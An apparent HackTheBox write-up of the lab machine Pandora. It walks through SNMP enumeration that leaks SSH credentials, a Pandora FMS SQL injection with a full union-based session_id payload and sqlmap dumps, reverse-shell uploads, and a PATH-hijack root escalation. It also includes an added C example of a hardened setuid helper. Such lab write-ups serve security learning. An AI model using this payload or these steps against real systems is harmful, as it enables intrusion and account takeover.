HackTheBox - Machines - Pandora.

Target address: 10.10.11.136 Attacker address: 10.10.14.24

1. Information gathering

First, scan the target's ports with Nmap. Ports 22 (SSH) and 80 (Web) are open, so start with the web page and look for information or anything exploitable.

Command: nmap -sS -sV -sC -T4 10.10.11.136

Nmap scan report for 10.10.11.136
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.18 seconds

When I did this box before, I had already mapped the IP to pandora.htb, so because of that old hosts entry I could reach it directly this time.

If this is your first time doing Pandora, just add the domain-to-IP mapping to your hosts file.

The web page came up but showed nothing useful, so I ran a directory scan.

The directory scan found nothing usable either, but since this is a lab box there must be a way in.

Scan the UDP ports with nmap as well.

You can see my own IP address in the snmp-netstat output; that is because by the time the UDP scan ran I had already established a connection to the target's SNMP service.

Command: nmap -sS -sU -sC -sV -O -T4 10.10.11.136

Nmap scan report for 10.10.11.136
Host is up (0.32s latency).
Not shown: 998 closed tcp ports (reset), 994 closed udp ports (port-unreach)
Bug in snmp-win32-software: no string output.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
22/udp open|filtered ssh
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
| 6:
| 9:
| 10:
| 11:
| 12:
| 13:
| 14:
| 15:
| 16:
| 17:
| 18:
| 20:
| 21:
| 22:
| 23:
| 24:
| 25:
| 26:
| 27:
| 28:
| 29:
| 30:
| 77:
| 78:
| 79:
| 80:
| 81:
| 82:
| 83:
| 84:
| 85:
|_ 88:
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 14.25 Mb sent, 14.25 Mb received
| VMware VMXNET3 Ethernet Controller
| IP address: 10.10.11.136 Netmask: 255.255.254.0
| MAC address: 00:50:56:b9:c8:18 (VMware)
| Type: ethernetCsmacd Speed: 4 Gbps
|_ Traffic stats: 18.62 Mb sent, 16.92 Mb received
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_ System uptime: 13h44m13.92s (4945392 timeticks)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 48fa95537765c36000000000
| snmpEngineBoots: 30
|_ snmpEngineTime: 13h44m14s
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 10.10.11.136:22 10.10.14.24:1079
| TCP 10.10.11.136:22 10.10.14.24:1081
| TCP 10.10.11.136:48448 10.10.14.2:4321
| TCP 10.10.11.136:48756 10.10.14.2:4321
| TCP 10.10.11.136:54026 10.10.14.2:4321
| TCP 10.10.11.136:54808 1.1.1.1:53
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
|_ UDP 127.0.0.53:53 *:*
1885/udp open|filtered vrtstrapserver
16970/udp open|filtered unknown
20872/udp open|filtered unknown
37813/udp open|filtered unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: Host: pandora; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1124.37 seconds

After the scan finishes you can see SNMP (Simple Network Management Protocol) listening on UDP port 161.

We can try connecting to it with snmpwalk, which can be downloaded from the net-snmp website.

2. Exploitation

Connection command: snmpwalk.exe -v 2c -c public 10.10.11.136

OID list: http://www.ttlsa.com/monitor/snmp-oid/

There is a lot of information in here, including the hostname, the number of network interfaces, CPU usage and so on.

One of the OIDs corresponds to the following information:

It looks like a username and password. The target has SSH open, so test these credentials with an SSH login.

username: daniel, password: HotelBabylon23

C:\Users\kami>ssh daniel@10.10.11.136
daniel@10.10.11.136's password:
Permission denied, please try again.
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu 10 Feb 09:47:53 UTC 2022

System load: 0.08
Usage of /: 63.1% of 4.87GB
Memory usage: 9%
Swap usage: 0%
Processes: 256
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:c818

=> /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Feb 9 19:49:10 2022 from 10.10.14.2
daniel@pandora:~$ whoami
daniel
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$

3. Privilege escalation, first stage

There is another account, matt, whose home directory contains user.txt, which should be the flag, but we have no permission to read it. So the next step is to find a way to escalate to the matt account.

I tried SUID, sudo and cron-job privilege escalation, but none of them seemed to work.

Let's curl the box itself and see what comes back.

I appended it to the URL to see what it is. For readability I modified my hosts file so that the IP maps to the pandora.htb domain.

It says not found, but when I run curl pandora.htb on the box itself I can clearly see it.

Time for an SSH tunnel.

C:\Users\kami>ssh -L 80:127.0.0.1:80 daniel@10.10.11.136
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu 10 Feb 10:04:59 UTC 2022

System load: 0.0
Usage of /: 63.1% of 4.87GB
Memory usage: 15%
Swap usage: 0%
Processes: 249
Users logged in: 1
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:c818

=> /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Feb 10 09:47:54 2022 from 10.10.14.24

The forward is now up: visiting 127.0.0.1 in the browser reaches the web service that exists only locally on the target.

The page title is Pandora FMS, and the footer shows version v7.0NG.742_FIX_PERL2020.

On https://cvedetails.com I found the corresponding CVE: a SQL injection.

The injection point is the session_id parameter of pandora_console/include/chart_generator.php, so throw it straight into sqlmap.

It dumped the database name, then the table names, and finally the session values.

+------------------------------------+
| taddress |
| taddress_agent |
| tagent_access |
| tagent_custom_data |
| tagent_custom_fields |
| tagent_custom_fields_filter |
| tagent_module_inventory |
| tagent_module_log |
| tagent_repository |
| tagent_secondary_group |
| tagente |
| tagente_datos |
| tagente_datos_inc |
| tagente_datos_inventory |
| tagente_datos_log4x |
| tagente_datos_string |
| tagente_estado |
| tagente_modulo |
| talert_actions |
| talert_commands |
| talert_snmp |
| talert_snmp_action |
| talert_special_days |
| talert_template_module_actions |
| talert_template_modules |
| talert_templates |
| tattachment |
| tautoconfig |
| tautoconfig_actions |
| tautoconfig_rules |
| tcategory |
| tcluster |
| tcluster_agent |
| tcluster_item |
| tcollection |
| tconfig |
| tconfig_os |
| tcontainer |
| tcontainer_item |
| tcredential_store |
| tdashboard |
| tdatabase |
| tdeployment_hosts |
| tevent_alert |
| tevent_alert_action |
| tevent_custom_field |
| tevent_extended |
| tevent_filter |
| tevent_response |
| tevent_rule |
| tevento |
| textension_translate_string |
| tfiles_repo |
| tfiles_repo_group |
| tgis_data_history |
| tgis_data_status |
| tgis_map |
| tgis_map_connection |
| tgis_map_has_tgis_map_con |
| tgis_map_layer |
| tgis_map_layer_groups |
| tgis_map_layer_has_tagente |
| tgraph |
| tgraph_source |
| tgraph_source_template |
| tgraph_template |
| tgroup_stat |
| tgrupo |
| tincidencia |
| titem |
| tlanguage |
| tlayout |
| tlayout_data |
| tlayout_template |
| tlayout_template_data |
| tlink |
| tlocal_component |
| tlog_graph_models |
| tmap |
| tmensajes |
| tmetaconsole_agent |
| tmetaconsole_agent_secondary_group |
| tmetaconsole_event |
| tmetaconsole_event_history |
| tmetaconsole_setup |
| tmigration_module_queue |
| tmigration_queue |
| tmodule |
| tmodule_group |
| tmodule_inventory |
| tmodule_relationship |
| tmodule_synth |
| tnetflow_filter |
| tnetflow_report |
| tnetflow_report_content |
| tnetwork_component |
| tnetwork_component_group |
| tnetwork_map |
| tnetwork_matrix |
| tnetwork_profile |
| tnetwork_profile_component |
| tnetworkmap_ent_rel_nodes |
| tnetworkmap_enterprise |
| tnetworkmap_enterprise_nodes |
| tnews |
| tnota |
| tnotification_group |
| tnotification_source |
| tnotification_source_group |
| tnotification_source_group_user |
| tnotification_source_user |
| tnotification_user |
| torigen |
| tpassword_history |
| tperfil |
| tphase |
| tplanned_downtime |
| tplanned_downtime_agents |
| tplanned_downtime_modules |
| tplugin |
| tpolicies |
| tpolicy_agents |
| tpolicy_alerts |
| tpolicy_alerts_actions |
| tpolicy_collections |
| tpolicy_groups |
| tpolicy_modules |
| tpolicy_modules_inventory |
| tpolicy_plugins |
| tpolicy_queue |
| tprofile_view |
| tprovisioning |
| tprovisioning_rules |
| trecon_script |
| trecon_task |
| trel_item |
| tremote_command |
| tremote_command_target |
| treport |
| treport_content |
| treport_content_item |
| treport_content_item_temp |
| treport_content_sla_com_temp |
| treport_content_sla_combined |
| treport_content_template |
| treport_custom_sql |
| treport_template |
| treset_pass |
| treset_pass_history |
| tserver |
| tserver_export |
| tserver_export_data |
| tservice |
| tservice_element |
| tsesion |
| tsesion_extended |
| tsessions_php |
| tskin |
| tsnmp_filter |
| ttag |
| ttag_module |
| ttag_policy_module |
| ttipo_modulo |
| ttransaction |
| ttrap |
| ttrap_custom_values |
| tupdate |
| tupdate_journal |
| tupdate_package |
| tupdate_settings |
| tuser_double_auth |
| tuser_task |
| tuser_task_scheduled |
| tusuario |
| tusuario_perfil |
| tvisual_console_elements_cache |
| twidget |
| twidget_dashboard |
+------------------------------------+

178 tables in total, but only three of them are session-related.

After testing, I chose to dump the tsessions_php table.

+----------------------------+------------------------------------------------------+-------------+
| id_session | data | last_active |
+----------------------------+------------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; | 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 |
| 1um23if7s531kqf5da14kf5lvm | NULL | 1638792211 |
| 226i87if97nt5hlqp51e9n8rrk | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1644436354 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL | 1638786129 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; | 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 |
| 4f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; | 1638535373 |
| 59qae699l0971h13qmbpqahlls | NULL | 1638787305 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; | 1638281946 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; | 1641195617 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 |
| 883c23eu7d1ndarij0qtg3kd12 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; | 1644437290 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; | 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; | 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; | 1638881664 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 |
| cs89puvbasun981denejfp64r2 | id_usuario|s:6:"daniel"; | 1644488590 |
| d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 |
| eng03tpqsi5243hajufjtmbdh3 | NULL | 1644488794 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; | 1641200284 |
| fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 |
| fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 |
| gnniv81mf01km3js0874s9ktd3 | NULL | 1644437818 |
| heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; | 1638168492 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; | 1638456173 |
| kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 |
| l33ouea0ibftaucjbdnv3spgfs | NULL | 1644488696 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 |
| ng1n291iilod73mebktb2vfu29 | id_usuario|s:6:"daniel"; | 1644436001 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; | 1638540482 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; | 1637667827 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; | 1638168416 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 |
| r6greufnpiikl6i06q7lcjgmnd | NULL | 1644448880 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; | 1638889082 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; | 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; | 1638793297 |
| vdoohnc7hlr1fglc7gamjqljrk | NULL | 1644488427 |
+----------------------------+------------------------------------------------------+-------------+

We can see session records for daniel, admin and matt in there.

Using the PoC: http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- exp

Then visit the backend at http://127.0.0.1/pandora_console/ and you are logged in.

But while I was doing this someone else was working on the box too and had overwritten the backend page with a command-shell page, so I could only execute commands directly.

Use python3 to send a reverse shell back.

Got the flag.

4. Escalating to root

First look at the files with the SUID bit set; here there is a binary called pandora_backup.

Running it gives an error; ignore that for now and first generate an SSH key pair so we can log in over SSH.

Generate an SSH key and log in directly as matt.

After generating it, create an id_rsa locally, also with permissions 700, and paste the generated key into it.

Then connect over SSH.

Once connected over SSH, start crafting the malicious file.

Create a tar, inject matt's home path into the environment variable, then run the pandora_backup file.
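The escalation above works because the setuid pandora_backup binary runs tar by bare name, so the kernel-privileged process resolves it through whatever search path the caller supplies. As an added example (my own code, not the machine's binary or Pandora FMS source), this is how a setuid helper should invoke tar: absolute path, a fixed environment, and execve instead of a shell; the /usr/bin/tar location and the sample paths in main are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Assumed location of tar; never a bare "tar" looked up through PATH. */
#define TAR_PATH "/usr/bin/tar"

/* Fixed environment handed to the child. Nothing from the caller's
 * environment (PATH, LD_PRELOAD, ...) is inherited by the child. */
static const char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL };

/* A command is acceptable only as an absolute path. */
int is_absolute_command(const char *cmd) {
    return cmd != NULL && cmd[0] == '/';
}

/* 1 if an environment entry is one of the fixed SAFE_ENV entries, else 0.
 * Anything the caller could have injected (e.g. PATH=/home/matt:...) is rejected. */
int env_entry_is_trusted(const char *entry) {
    for (size_t i = 0; SAFE_ENV[i] != NULL; i++)
        if (strcmp(entry, SAFE_ENV[i]) == 0) return 1;
    return 0;
}

/* Archive src_dir into archive via execve: no shell, no PATH lookup.
 * Returns tar's exit status, or -1 if tar could not be started. */
int run_backup(const char *src_dir, const char *archive) {
    if (!is_absolute_command(TAR_PATH)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "tar", "-cf", (char *)archive, (char *)src_dir, NULL };
        execve(TAR_PATH, argv, (char *const *)SAFE_ENV);
        _exit(127); /* only reached if execve failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Sample paths (assumed); a real helper would also validate its arguments. */
    int rc = run_backup("/var/www", "/tmp/backup.tar");
    printf("tar exited with %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```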

This box was genuinely hard for me, to the point that I searched the whole internet for writeups...

5. Supplement: getting into the backend

Using the PoC: http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- exp

Then visit the backend at http://127.0.0.1/pandora_console/ and you are logged in.

Then find the file manager under admin tools.

Click upload and upload a PHP reverse shell, then visit it directly to trigger the callback.

After upload the file is located under pandora_console/images/.

Start an nc listener locally and visit http://127.0.0.1/pandora_console/images/1.php

and the shell comes back.

References:

https://zhuanlan.zhihu.com/p/458926451

https://blog.peterjbrowning.com/2022/01/htb-writeup-pandora